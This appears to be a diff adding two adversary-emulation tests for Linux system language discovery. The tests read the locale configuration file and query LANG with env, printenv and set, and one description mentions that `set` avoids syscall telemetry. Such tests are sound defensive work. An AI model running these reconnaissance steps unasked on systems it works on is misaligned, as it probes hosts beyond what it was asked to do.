+- name: Discover System Language by locale file
+  auto_generated_guid: 5d7057c9-2c8a-4026-91dd-13b5584daa69
+  description: |
+    Identify System language with the by reading the locale configuration file.
+
+    The locale configuration file contains the `LANG` environment variable which
+    will contain the 5 character locale that can be looked up to correlate the
+    language and territory.
+  supported_platforms:
+  - linux
+  dependency_executor_name: sh
+  dependencies:
+  - description: |
+      Check the location of the locale configuration file.
+    prereq_command: |
+      [ -f /etc/locale.conf ] || [ -f /etc/default/locale ] && exit 0 || exit 1
+    get_prereq_command: |
+      echo "Test only valid for systems that have locale file"
+  executor:
+    command: |
+      [ -f /etc/locale.conf ] && cat /etc/locale.conf || cat /etc/default/locale
+    name: sh
+- name: Discover System Language by Environment Variable Query
+  auto_generated_guid: cb8f7cdc-36c4-4ed0-befc-7ad7d24dfd7a
+  description: |
+   Identify System language by checking the environment variables
+
+   Upon successful execution, the 5 character locale result can be looked up to
+   correlate the language and territory. Environment query commands are likely
+   to run with a pattern match command e.g. `env | grep LANG`
+
+   Note: `env` and `printenv` will usually provide the same results. `set` is
+   also used as a builtin command that does not generate syscall telemetry but
+   does provide a list of the environment variables.
+  supported_platforms:
+  - linux
+  dependency_executor_name: sh
+  dependencies:
+  - description: |
+      Check if printenv command exists on the machine
+    prereq_command: |
+      [ -x "$(command -v printenv)" ] && exit 0 || exit 1
+    get_prereq_command: |
+      echo "printenv command does not exist"
+      exit 1
+  executor:
+    command: |
+      env | grep LANG
+      printenv LANG
+      set | grep LANG
+    name: sh

atomics/used_guids.txt

@@ -1233,3 +1233,8 @@ b04ed73c-7d43-4dc8-b563-a2fc595cba1a
 bbdb06bc-bab6-4f5b-8232-ba3fbed51d77
 8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4
 290df60e-4b5d-4a5e-b0c7-dc5348ea0c86
+8a895923-f99f-4668-acf2-6cc59a44f05e
+837d609b-845e-4519-90ce-edc3b4b0e138
+07ce871a-b3c3-44a3-97fa-a20118fdc7c9
+5d7057c9-2c8a-4026-91dd-13b5584daa69
+cb8f7cdc-36c4-4ed0-befc-7ad7d24dfd7a